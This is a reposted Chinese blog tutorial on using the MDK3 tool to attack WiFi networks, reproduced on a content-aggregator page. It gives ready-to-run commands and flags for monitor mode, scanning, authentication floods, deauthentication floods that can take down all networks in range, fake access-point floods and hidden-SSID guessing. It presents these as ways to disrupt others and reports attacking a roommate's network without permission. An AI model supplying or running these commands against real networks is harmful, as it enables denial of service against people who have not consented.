打开APP
userphoto
未登录

开通VIP,畅享免费电子书等14项超值服

开通VIP
损人不利己 — MDK3 WiFi攻击
激活网卡为监听模式
airmon-ng start wlan0
扫描附近的无线信号
airodump-ng mon0
方法一:身份验证攻击
这是一种验证请求攻击模式:在这个模式里,软件自动模拟随机产生的mac向目标AP发起大量验证请求,可以导致AP忙于处理过多的请求而停止对正常连接客户端的响应
mdk3 mon0 a
-a<ap_mac> #测试指定BSSID
-m#使用有效数据库中的客户端mac地址
-c#对应 -a ,不检查是否测试成功
-i<ap_mac> #对指定BSSID进行智能攻击
-s<pps> #速率,默认50
mdk3 网卡 攻击模式 目标
mdk3 mon0 a -a MAC
以下是攻击宿友电脑创建的无线,效果如下。
方法二:伪造断开连接
在这个模式下,软件会向周围所有可见AP不断发出“断开连接”的包......可以造成一定范围内的无线网络瘫痪(当然有白名单,黑名单模式),直到手动停止攻击!
mdk3 mon0 d
-w<filename>            #白名单mac地址列表文件
-b<filename>             #黑名单mac地址列表文件
-s<pps>                       #速率,这个模式下默认无限制
-c[chan,chan,chan,...]                 #信道,可以多填,如 2,4,5,1
mdk3 mon0 d -c 11
以下是方法二测试视频:
http://my.tv.sohu.com/us/235484955/76316147.shtml
方法三:伪造AP
产生大量死亡SSID来充斥无线客户端的无线列表,扰乱用户;还可以自定义发送死亡SSID的BSSID和ESSID、加密方式(如wep/wpa2)等。感觉鸡肋
mdk3 mon0 b
-n<ssid>       #自定义ESSID
-f<filename>           #读取ESSID列表文件
-v<filename>          #自定义ESSID和BSSID对应列表文件
-d      #自定义为Ad-Hoc模式
-w        #自定义为wep模式
-g       #54Mbit模式
-t  # WPA TKIP encryption
-a#WPA AES encryption
-m#读取数据库的mac地址
-c<chan> #自定义信道
-s<pps> #发包速率
mdk3 --help b #查看详细内容
方法四:探测AP信息和ESSID猜解模式
mdk3 mon0 p
-e<ssid>         #待检测的ssid
-f<filename>         #检测AP设置为隐藏的ssid列表文件
-t<bssid>              #用bssid检测AP的信息
-s<pps>               #速率,默认300
-b<characterset>             #设置字符集
转载请注明出处(http://www.jeehsu.com/1993.html)
来源网站:几许博客
本站仅提供存储服务,所有内容均由用户发布,如发现有害或侵权内容,请点击举报
打开APP,阅读全文并永久保存 查看更多类似文章
猜你喜欢
类似文章
MKD3 攻击
手把手教大家搭建一个低成本的多功能移动渗透测试站点
SSID、BSSID、ESSID区别?
BSSID,SSID,ESSID区别
BSSID与ESSID区别
简单六步提高企业无线网络安全性
更多类似文章 >>
生活服务
热点新闻
分享 收藏 导长图 关注 下载文章
绑定账号成功
后续可登录账号畅享VIP特权!
如果VIP功能使用有故障,
可点击这里联系客服!

联系客服